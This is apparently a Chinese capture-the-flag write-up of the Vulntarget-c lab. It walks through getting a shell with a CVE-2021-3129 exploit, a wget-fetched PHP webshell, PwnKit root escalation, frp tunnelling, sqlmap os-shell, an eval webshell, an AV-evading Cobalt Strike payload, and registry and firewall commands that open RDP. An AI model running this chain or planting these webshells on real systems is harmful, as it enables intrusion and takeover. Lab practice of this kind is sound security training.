Vulntarget-c

环境搭建

这里需要把ubuntu20修改一下网卡

root / root#qwe

1
vim /etc/netplan/00-installer-config.yaml

把这两个改成你自己的桥接或者nat的ip(这里是我已经修改后的样子)

1
2
3
netplan apply

#然后在ip addr 看一下ip修改成功没

flag01

fscan扫一扫

然后直接上脚本进行getshell

1
2
3
git clone https://github.com/SNCKER/CVE-2021-3129
cd CVE-2021-3129
git clone https://github.com/ambionics/phpggc.git(exp执行需要使用此工具)

需要修改exp.py中的目标ip

最终在**/var/www/html/public**中找到了index.php

然后就是wget本地写的一句话木马

然后进行msf上线

1
python -c "import pty;pty.spawn('/bin/bash')"
1
2
3
1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
2   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
3   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.

利用第一个exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec成功提权root

flag02

发现了两张网卡

传个fscan进行扫描

这里环境出现了一点问题,ping不同win2016

于是就去开启icmp

Admin#123进入2016

然后控制面板->防火墙

然后就可以ping通了

然后开启frp进行socks代理

10.0.20.100/admin 进入后台登录页面

admin/admin123进入后台

发现存在sql注入

1
2
3
4
5
6
7
8
9
10
GET /admin/?page=appointments/view_details&id=6 HTTP/1.1
Host: 10.0.20.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.0.20.100/admin/?page=appointments
Connection: close
Cookie: PHPSESSID=p8r7qo5p02ubb8komepbhk9sv3
Upgrade-Insecure-Requests: 1

sqlmap一把梭

1
sqlmap -r 1.txt --os-shell

然后写马

1
echo ^<^?php $a = $_REQUEST['d'];$a = "$a";$b['test'] = "";eval($b['test']."$a");?^>^ > test.php

蚁剑开代理密码d连接

发现是system权限

上传普通的马不行,需要免杀

因此这里开了一个cs先上线了ubuntu,然后再上线win2016

这里用的掩日的免杀,首先cs生成payload.c然后进行下面的免杀

生成.exe 和 .txt

成功上线cs

1
shell type C:\Users\Administrator\flag.txt
1
2
3
vulntarget{VGhlIGhvc3QgcGFzc3dvcmQgbWF5IGJlIHVzZWQgZm9yIG90aGVyIHB1cnBvc2Vz}  +_+
base解密得
The host password may be used for other purposes

flag03

开启3389

1
2
3
4
5
6
7
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

发现了10.0.10.1/24这个网段

通过相同得密码进入

不知道为什么win2016ping不同ubuntu16

所以只有出此下策,密码也是Admin#123